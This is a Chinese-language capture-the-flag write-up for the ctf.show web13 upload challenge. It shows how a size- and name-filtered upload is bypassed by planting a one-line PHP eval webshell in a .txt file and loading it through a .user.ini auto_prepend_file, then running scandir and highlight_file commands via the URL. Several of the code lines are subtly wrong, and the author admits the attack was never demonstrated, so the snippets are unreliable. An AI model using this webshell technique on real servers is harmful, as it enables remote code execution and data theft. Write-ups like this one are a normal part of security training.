ctf.show_web13
今天也算是碰到一个新类型的文件上传类的题目(与文件包含结合了可以说)首先尝试了直接传一句话木马,全都被ban了,算是没招了就扫了下目录,
进去看一眼,好像页面没回显什么东西,再试试看upload.php.bak(这里看备份文件算是一种新思路,说不定过滤了什么东西或者是题目提示啥的就藏在里面)
我们可以看到文件大小不能超过24个字节,文件名不能超过9个字符,文件名过滤了php和i,上传正常的一句话木马和图片马都会显示 error file size
这个时候重头戏来了,我们可以利用 .user.ini这个配置文件来进行文件包含
在php中".user.ini"有如下解释:php会在每个目录下搜寻文件名,如果设定为空字符串则php不会搜寻,也就是在“.user.ini”中如果设置了文件名,那么任意一个页面都将该文件中的内容包含进去
用脚想都知道我们肯定是要包含一句话木马,但是又不能超过24个字节,那么我们可以这么写,(写.txt文件里面,php会被ban)
<?php eval($_GET('a'))
这样可以算一个木马(因为我刚写完就被windows给杀了),.user.ini文件可以这么写,
auto_prepend_file:在页面顶部加载文件auto_append_file:在页面底部加载文件(上下两个任取一个即可)
写好以后上传即可
这边由于题目有点问题暂时打不开,没办法演示了,上传完以后在网站url后拼接 /?a=print_r(scandir(./)),查看当前目录下的所有文件,可以看见我们刚刚上传的.user.ini文件还有a.txt文件,还有一个超长名字的php文件,然后利用命令查看该文件即可
/?a=highlightfile(dhawuoidhaiohdoiawdioad.php)